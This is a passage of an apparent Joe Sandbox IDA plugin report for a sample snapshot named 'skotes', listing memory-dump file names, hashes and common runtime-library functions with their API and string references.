Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 2663199487-3650809737
Opcode ID: aa3468c7faadcda5a40efb0895119297ec3fd0c8f5ea24ec0fd6cbe3ccc2c3b2
Instruction ID: d938dad3e01fe1c3cb28ac96880e6ec51d3da751d4f76c3a03592a500d8dd5a7
Opcode Fuzzy Hash: aa3468c7faadcda5a40efb0895119297ec3fd0c8f5ea24ec0fd6cbe3ccc2c3b2
Instruction Fuzzy Hash: F0218336A00615EFCB14EF58C891FAD77B5BF88314F108069F51A97692DB71AE01CB91

Function 0097B975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0097BA0E

Strings

RoInitialize, xrefs: 0097B998
combase.dll, xrefs: 0097B983, 0097B988, 0097B99D, 0097B9C8
RoUninitialize, xrefs: 0097B9C1

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: RoInitialize$RoUninitialize$combase.dll
API String ID: 348560076-3997890769
Opcode ID: 066d011ee99d2ef9580bb2e78df242d090e68b13a6b24ba62dc6654f559e228a
Instruction ID: 08d4c91cf685f40c57b4a058b7809d50c953c6f8cf119ec7b6d3ee7f3ecaa59c
Opcode Fuzzy Hash: 066d011ee99d2ef9580bb2e78df242d090e68b13a6b24ba62dc6654f559e228a
Instruction Fuzzy Hash: 5B012872581316AEFB10B7B55C01BAB35DC9F0272CF219829F654E3290FF74E80186A5

Function 00976E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SafeRWList.LIBCONCRT ref: 00976E73

Part of subcall function 00974E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00974E7F
Part of subcall function 00974E6E: List.LIBCMT ref: 00974E89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00976E85
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00976EAA

Strings

eventObject, xrefs: 00976E7D

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1288476792-1680012138
Opcode ID: c748abdc2a280b1c7d0c01ab8579d79fd266d8e4212e3d39ae64538be0cb8e09
Instruction ID: 10758274961190fa677238b4f7c68e7fe408d5e06000eebf341f7cdcc107d35b
Opcode Fuzzy Hash: c748abdc2a280b1c7d0c01ab8579d79fd266d8e4212e3d39ae64538be0cb8e09
Instruction Fuzzy Hash: 02112176940308EBDB24EBA4CC86FFF72AC5F44718F208525B518A60C1EB34AA04C6B2

Function 0097A0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0097A102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0097A126
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0097A139

Strings

pScheduler, xrefs: 0097A131

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 1ee6492731c941b8340001ebfdd1bfddfd60aa3152f8a204419a661bddad3006
Instruction ID: 90a1b5caf55725157405dd982f97afd1443c07e4b326b317e78ef2c006f43905
Opcode Fuzzy Hash: 1ee6492731c941b8340001ebfdd1bfddfd60aa3152f8a204419a661bddad3006
Instruction Fuzzy Hash: FBF0E977904204A7C724FA54DC52DAEB37C9ED1764B90C529E40D57181DB70AA05C6D2

Function 0098CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0098CC66

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
